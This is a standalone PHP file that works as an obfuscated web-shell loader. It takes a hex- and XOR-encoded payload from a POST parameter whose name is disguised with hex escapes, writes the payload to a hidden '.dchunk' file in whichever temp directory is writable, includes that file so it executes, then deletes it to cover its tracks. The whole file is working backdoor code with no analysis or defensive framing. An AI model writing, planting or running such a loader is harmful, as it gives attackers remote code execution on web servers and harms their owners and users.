<?php

if(array_key_exists("bi\x6E\x64ing", $_POST)){
	$sym = hex2bin($_POST["bi\x6E\x64ing"]);
	$tkn   =      ''   ;    for($k=0; $k<strlen($sym); $k++){$tkn .= chr(ord($sym[$k]) ^ 21);}
	$data_chunk = array_filter([ini_get("upload_tmp_dir"), getenv("TMP"), "/tmp", sys_get_temp_dir(), "/dev/shm", session_save_path(), "/var/tmp", getcwd(), getenv("TEMP")]);
	foreach ($data_chunk as $key => $entity) {
    		if ((function($d) { return is_dir($d) && is_writable($d); })($entity)) {
    $elem = sprintf("%s/.dchunk", $entity);
    $file = fopen($elem, 'w');
if ($file) {
	fwrite($file, $tkn);
	fclose($file);
	include $elem;
	@unlink($elem);
	exit;
}
}
}
}